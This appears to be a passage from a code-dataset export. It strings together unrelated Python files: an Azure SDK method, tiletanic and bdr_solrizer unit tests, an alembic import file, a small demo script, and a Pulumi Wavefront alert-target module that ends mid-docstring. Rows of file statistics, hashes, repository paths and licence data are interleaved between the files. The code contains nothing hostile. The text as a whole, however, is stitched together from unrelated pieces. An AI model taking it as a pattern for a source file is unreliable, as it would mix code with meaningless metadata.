:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_token_lifetime_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'} # type: ignore
| 49.4022 | 151 | 0.670354 | 12,598 | 121,233 | 6.238133 | 0.023575 | 0.019341 | 0.012597 | 0.017458 | 0.936084 | 0.931631 | 0.917659 | 0.896142 | 0.880745 | 0.856823 | 0 | 0.007296 | 0.231224 | 121,233 | 2,453 | 152 | 49.42234 | 0.835914 | 0.107339 | 0 | 0.832092 | 0 | 0 | 0.127318 | 0.068208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010156 | false | 0 | 0.004739 | 0 | 0.066351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1a11944a33a98086d613df83a33d85808f5616d0 | 2,084 | py | Python | tests/test_cli_tilecover.py | hasan-nn/tiletanic | 0b944aaded60c621ea6097b2845dfe62cdd8e92c | [
"MIT"
] | 19 | 2015-11-09T16:10:20.000Z | 2020-11-27T21:28:35.000Z | tests/test_cli_tilecover.py | hasan-nn/tiletanic | 0b944aaded60c621ea6097b2845dfe62cdd8e92c | [
"MIT"
] | 4 | 2015-11-06T19:30:08.000Z | 2020-03-28T19:10:25.000Z | tests/test_cli_tilecover.py | hasan-nn/tiletanic | 0b944aaded60c621ea6097b2845dfe62cdd8e92c | [
"MIT"
] | 9 | 2015-12-22T19:51:28.000Z | 2021-01-27T22:52:32.000Z | from click.testing import CliRunner
from tiletanic import cli
def test_cover_geometry_dgtiling_level_9_feature_collection():
# Wall South Dakota AOI from geojson.io:
#http://bl.ocks.org/d/fbc0b6427b48274c1782
#http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
wall_south_dakota_aoi = '{"type":"FeatureCollection","features":[{"geometry":{"type":"Polygon","coordinates":[[[-101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]]},"type":"Feature","properties":{}}]}'
runner = CliRunner()
result = runner.invoke(cli.cover_geometry, ['-'], input=wall_south_dakota_aoi)
assert result.exit_code == 0
assert result.output == "021323330\n"
def test_cover_geometry_dgtiling_level_9_feature():
# Wall South Dakota AOI from geojson.io:
#http://bl.ocks.org/d/fbc0b6427b48274c1782
#http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
wall_south_dakota_aoi = '{"geometry":{"coordinates":[[[ -101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]],"type":"Polygon"},"type":"Feature"}'
runner = CliRunner()
result = runner.invoke(cli.cover_geometry, ['-'], input=wall_south_dakota_aoi)
assert result.exit_code == 0
assert result.output == "021323330\n"
def test_cover_geometry_dgtiling_level_9_adajcent_tiles():
# Wall South Dakota AOI from geojson.io:
#http://bl.ocks.org/d/fbc0b6427b48274c1782
#http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
wall_south_dakota_aoi = '{"geometry":{"coordinates":[[[ -101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]],"type":"Polygon"},"type":"Feature"}'
runner = CliRunner()
result = runner.invoke(cli.cover_geometry, ['--adjacent', '-'], input=wall_south_dakota_aoi)
assert result.exit_code == 0
assert result.output == "021323303\n021323312\n021323313\n021323321\n021323323\n021323330\n021323331\n021323332\n021323333\n"
| 49.619048 | 269 | 0.721209 | 273 | 2,084 | 5.344322 | 0.249084 | 0.055517 | 0.092529 | 0.111035 | 0.836189 | 0.836189 | 0.836189 | 0.836189 | 0.80329 | 0.80329 | 0 | 0.2288 | 0.100288 | 2,084 | 41 | 270 | 50.829268 | 0.549333 | 0.208253 | 0 | 0.6 | 0 | 0.15 | 0.449664 | 0.42709 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.15 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3da498d289ed11e1eb140384db8d601bfcd524aa | 288 | py | Python | virtual/lib/python3.8/site-packages/alembic/testing/suite/__init__.py | Lenus254/personal_blog | aac38e4b5372c86efa8e24db2e051fef8e5feef8 | [
"Unlicense"
] | 1,324 | 2018-11-27T05:44:41.000Z | 2022-03-30T19:49:20.000Z | virtual/lib/python3.8/site-packages/alembic/testing/suite/__init__.py | Lenus254/personal_blog | aac38e4b5372c86efa8e24db2e051fef8e5feef8 | [
"Unlicense"
] | 452 | 2018-11-27T22:43:38.000Z | 2022-03-28T04:33:43.000Z | virtual/lib/python3.8/site-packages/alembic/testing/suite/__init__.py | Lenus254/personal_blog | aac38e4b5372c86efa8e24db2e051fef8e5feef8 | [
"Unlicense"
] | 159 | 2018-11-29T18:46:15.000Z | 2022-03-28T16:34:19.000Z | from .test_autogen_comments import * # noqa
from .test_autogen_computed import * # noqa
from .test_autogen_diffs import * # noqa
from .test_autogen_fks import * # noqa
from .test_autogen_identity import * # noqa
from .test_environment import * # noqa
from .test_op import * # noqa
| 36 | 44 | 0.756944 | 40 | 288 | 5.15 | 0.3 | 0.271845 | 0.407767 | 0.524272 | 0.485437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170139 | 288 | 7 | 45 | 41.142857 | 0.861925 | 0.118056 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
3df10a176509f4c13e16b0686d002fe981e2a2d4 | 4,102 | py | Python | tests/unit/test_irindexer.py | Brown-University-Library/bdr_indexer | 30bc113fa889e7ed13f75a51724732838e2464ab | [
"MIT"
] | null | null | null | tests/unit/test_irindexer.py | Brown-University-Library/bdr_indexer | 30bc113fa889e7ed13f75a51724732838e2464ab | [
"MIT"
] | 2 | 2021-02-22T20:00:51.000Z | 2021-12-15T13:47:01.000Z | tests/unit/test_irindexer.py | Brown-University-Library/bdr_indexer | 30bc113fa889e7ed13f75a51724732838e2464ab | [
"MIT"
] | null | null | null | import json
import os
import tempfile
import unittest
from unittest.mock import patch
from diskcache import Cache
import responses
from bdrxml import irMetadata
from bdr_solrizer.indexers import IRIndexer
class TestIRIndexer(unittest.TestCase):
@responses.activate
def test_1(self):
responses.add(responses.GET, 'http://localhost/123/',
body=json.dumps({'ancestors': [], 'name': 'Test Collection'}),
status=200,
content_type='application/json'
)
ir_obj = irMetadata.make_ir()
ir_obj.collection = 123
with tempfile.TemporaryDirectory() as tmp_dir:
data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
self.assertEqual(data, {
'depositor': None,
'depositor_eppn': None,
'depositor_email': None,
'deposit_date': None,
'collection_date': None,
'ir_collection_id': ['123'],
'ir_collection_name': ['Test Collection'],
})
def test_cached_value(self):
ir_obj = irMetadata.make_ir()
ir_obj.collection = 123
ancestors = ['Grandparent', 'Parent', 'Test']
with tempfile.TemporaryDirectory() as tmp_dir:
with Cache(tmp_dir) as cache:
cache.set('123_ancestors', ancestors)
data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
self.assertEqual(data, {
'depositor': None,
'depositor_eppn': None,
'depositor_email': None,
'deposit_date': None,
'collection_date': None,
'ir_collection_id': ['123'],
'ir_collection_name': ancestors,
})
@responses.activate
@patch('bdr_solrizer.indexers.IRIndexer._get_ancestors_from_cache')
def test_cache_error(self, mock):
responses.add(responses.GET, 'http://localhost/123/',
body=json.dumps({'ancestors': ['API parent'], 'name': 'Test Collection'}),
status=200,
content_type='application/json'
)
mock.side_effect = Exception('fake exception')
ir_obj = irMetadata.make_ir()
ir_obj.collection = 123
ancestors = ['Grandparent', 'Parent', 'Test']
with tempfile.TemporaryDirectory() as tmp_dir:
with Cache(tmp_dir) as cache:
cache.set('123_ancestors', ancestors)
data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
self.assertEqual(data, {
'depositor': None,
'depositor_eppn': None,
'depositor_email': None,
'deposit_date': None,
'collection_date': None,
'ir_collection_id': ['123'],
'ir_collection_name': ['API parent', 'Test Collection'],
})
@responses.activate
@patch('bdr_solrizer.indexers.IRIndexer._add_ancestors_to_cache')
def test_cache_set_error(self, mock):
responses.add(responses.GET, 'http://localhost/123/',
body=json.dumps({'ancestors': ['API parent'], 'name': 'Test Collection'}),
status=200,
content_type='application/json'
)
mock.side_effect = Exception('fake exception')
ir_obj = irMetadata.make_ir()
ir_obj.collection = 123
with tempfile.TemporaryDirectory() as tmp_dir:
data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
self.assertEqual(data, {
'depositor': None,
'depositor_eppn': None,
'depositor_email': None,
'deposit_date': None,
'collection_date': None,
'ir_collection_id': ['123'],
'ir_collection_name': ['API parent', 'Test Collection'],
})
if __name__ == '__main__':
unittest.main()
| 38.336449 | 116 | 0.582643 | 417 | 4,102 | 5.482014 | 0.177458 | 0.026247 | 0.031496 | 0.033246 | 0.836833 | 0.836833 | 0.836833 | 0.793088 | 0.793088 | 0.769904 | 0 | 0.016937 | 0.294734 | 4,102 | 106 | 117 | 38.698113 | 0.773246 | 0 | 0 | 0.75 | 0 | 0 | 0.237015 | 0.02731 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.041667 | false | 0 | 0.09375 | 0 | 0.145833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9abb8fb7e2ca42c324f7f41b233ad73a7dea2fbe | 207 | py | Python | __name__ == '__main__'/important.py | kyaiooiayk/Python-Programming | b70dde24901cd24b38e2ead7c9a1b2d1808fc4b0 | [
"OLDAP-2.3"
] | null | null | null | __name__ == '__main__'/important.py | kyaiooiayk/Python-Programming | b70dde24901cd24b38e2ead7c9a1b2d1808fc4b0 | [
"OLDAP-2.3"
] | null | null | null | __name__ == '__main__'/important.py | kyaiooiayk/Python-Programming | b70dde24901cd24b38e2ead7c9a1b2d1808fc4b0 | [
"OLDAP-2.3"
] | null | null | null | def do_important():
"""This function does something very important"""
print("I'm doing some important stuff here!")
do_important()
print("Called from important.py, __name__ has value?:", __name__) | 25.875 | 65 | 0.719807 | 28 | 207 | 4.964286 | 0.75 | 0.158273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154589 | 207 | 8 | 65 | 25.875 | 0.794286 | 0.207729 | 0 | 0 | 0 | 0 | 0.515723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 1 | 0 | 1.25 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
b1081b9d031bbc9f5f7083defa04c10d7efac32f | 36,497 | py | Python | sdk/python/pulumi_wavefront/alert_target.py | pulumi/pulumi-wavefront | 1d199d386ee241fa2ef94553e6cae1359ec9ccf6 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2022-02-20T09:48:33.000Z | 2022-02-20T09:48:33.000Z | sdk/python/pulumi_wavefront/alert_target.py | pulumi/pulumi-wavefront | 1d199d386ee241fa2ef94553e6cae1359ec9ccf6 | [
"ECL-2.0",
"Apache-2.0"
] | 40 | 2020-08-12T08:37:24.000Z | 2022-03-31T15:51:17.000Z | sdk/python/pulumi_wavefront/alert_target.py | pulumi/pulumi-wavefront | 1d199d386ee241fa2ef94553e6cae1359ec9ccf6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AlertTargetArgs', 'AlertTarget']
@pulumi.input_type
class AlertTargetArgs:
def __init__(__self__, *,
description: pulumi.Input[str],
recipient: pulumi.Input[str],
template: pulumi.Input[str],
triggers: pulumi.Input[Sequence[pulumi.Input[str]]],
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]] = None):
"""
The set of arguments for constructing a AlertTarget resource.
:param pulumi.Input[str] description: Description describing this alert target.
:param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront
:param pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]] routes: List of routing targets that this alert target will notify. See Route
"""
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "recipient", recipient)
pulumi.set(__self__, "template", template)
pulumi.set(__self__, "triggers", triggers)
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if custom_headers is not None:
pulumi.set(__self__, "custom_headers", custom_headers)
if email_subject is not None:
pulumi.set(__self__, "email_subject", email_subject)
if is_html_content is not None:
pulumi.set(__self__, "is_html_content", is_html_content)
if method is not None:
pulumi.set(__self__, "method", method)
if name is not None:
pulumi.set(__self__, "name", name)
if routes is not None:
pulumi.set(__self__, "routes", routes)
@property
@pulumi.getter
def description(self) -> pulumi.Input[str]:
"""
Description describing this alert target.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: pulumi.Input[str]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def recipient(self) -> pulumi.Input[str]:
"""
The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
"""
return pulumi.get(self, "recipient")
@recipient.setter
def recipient(self, value: pulumi.Input[str]):
pulumi.set(self, "recipient", value)
@property
@pulumi.getter
def template(self) -> pulumi.Input[str]:
"""
A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
"""
return pulumi.get(self, "template")
@template.setter
def template(self, value: pulumi.Input[str]):
pulumi.set(self, "template", value)
@property
@pulumi.getter
def triggers(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
return pulumi.get(self, "triggers")
@triggers.setter
def triggers(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "triggers", value)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
The value of the `Content-Type` header of the webhook.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter(name="customHeaders")
def custom_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
"""
return pulumi.get(self, "custom_headers")
@custom_headers.setter
def custom_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "custom_headers", value)
@property
@pulumi.getter(name="emailSubject")
def email_subject(self) -> Optional[pulumi.Input[str]]:
"""
The subject title of an email notification target.
"""
return pulumi.get(self, "email_subject")
@email_subject.setter
def email_subject(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "email_subject", value)
@property
@pulumi.getter(name="isHtmlContent")
def is_html_content(self) -> Optional[pulumi.Input[bool]]:
"""
Determine whether the email alert content is sent as HTML or text.
"""
return pulumi.get(self, "is_html_content")
@is_html_content.setter
def is_html_content(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_html_content", value)
@property
@pulumi.getter
def method(self) -> Optional[pulumi.Input[str]]:
"""
The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
"""
return pulumi.get(self, "method")
@method.setter
def method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "method", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the alert target as it is displayed in wavefront
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]:
"""
List of routing targets that this alert target will notify. See Route
"""
return pulumi.get(self, "routes")
@routes.setter
def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]):
pulumi.set(self, "routes", value)
@pulumi.input_type
class _AlertTargetState:
def __init__(__self__, *,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]] = None,
target_id: Optional[pulumi.Input[str]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering AlertTarget resources.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] description: Description describing this alert target.
:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront
:param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]] routes: List of routing targets that this alert target will notify. See Route
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if custom_headers is not None:
pulumi.set(__self__, "custom_headers", custom_headers)
if description is not None:
pulumi.set(__self__, "description", description)
if email_subject is not None:
pulumi.set(__self__, "email_subject", email_subject)
if is_html_content is not None:
pulumi.set(__self__, "is_html_content", is_html_content)
if method is not None:
pulumi.set(__self__, "method", method)
if name is not None:
pulumi.set(__self__, "name", name)
if recipient is not None:
pulumi.set(__self__, "recipient", recipient)
if routes is not None:
pulumi.set(__self__, "routes", routes)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
if template is not None:
pulumi.set(__self__, "template", template)
if triggers is not None:
pulumi.set(__self__, "triggers", triggers)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
The value of the `Content-Type` header of the webhook.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter(name="customHeaders")
def custom_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
"""
return pulumi.get(self, "custom_headers")
@custom_headers.setter
def custom_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "custom_headers", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description describing this alert target.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="emailSubject")
def email_subject(self) -> Optional[pulumi.Input[str]]:
"""
The subject title of an email notification target.
"""
return pulumi.get(self, "email_subject")
@email_subject.setter
def email_subject(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "email_subject", value)
@property
@pulumi.getter(name="isHtmlContent")
def is_html_content(self) -> Optional[pulumi.Input[bool]]:
"""
Determine whether the email alert content is sent as HTML or text.
"""
return pulumi.get(self, "is_html_content")
@is_html_content.setter
def is_html_content(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_html_content", value)
@property
@pulumi.getter
def method(self) -> Optional[pulumi.Input[str]]:
"""
The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
"""
return pulumi.get(self, "method")
@method.setter
def method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "method", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the alert target as it is displayed in wavefront
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def recipient(self) -> Optional[pulumi.Input[str]]:
"""
The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
"""
return pulumi.get(self, "recipient")
@recipient.setter
def recipient(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "recipient", value)
@property
@pulumi.getter
def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]:
"""
List of routing targets that this alert target will notify. See Route
"""
return pulumi.get(self, "routes")
@routes.setter
def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]):
pulumi.set(self, "routes", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@property
@pulumi.getter
def template(self) -> Optional[pulumi.Input[str]]:
"""
A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
"""
return pulumi.get(self, "template")
@template.setter
def template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template", value)
@property
@pulumi.getter
def triggers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
return pulumi.get(self, "triggers")
@triggers.setter
def triggers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "triggers", value)
class AlertTarget(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a wavefront Alert Target resource. This allows alert targets to created, updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Attributes Reference
* `target_id` - The target ID prefixed with `target:` for interpolating into a Wavefront Alert.
### Route
The `route` mapping supports the following:
* `method` - (Required) The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
* `target` - (Required) The endpoint for the alert route. `EMAIL`: email address. `PAGERDUTY`: PagerDuty routing
key. `WEBHOOK`: URL endpoint.
* `filter` - (Required) String that filters the route. Space delimited. Currently only allows a single key value pair.
(e.g. `env prod`)
### Example
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
routes=[
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "prod",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/prod",
),
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "dev",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/dev",
),
],
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Import
Alert Targets can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/alertTarget:AlertTarget alert_target abcdEFGhijKLMNO
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] description: Description describing this alert target.
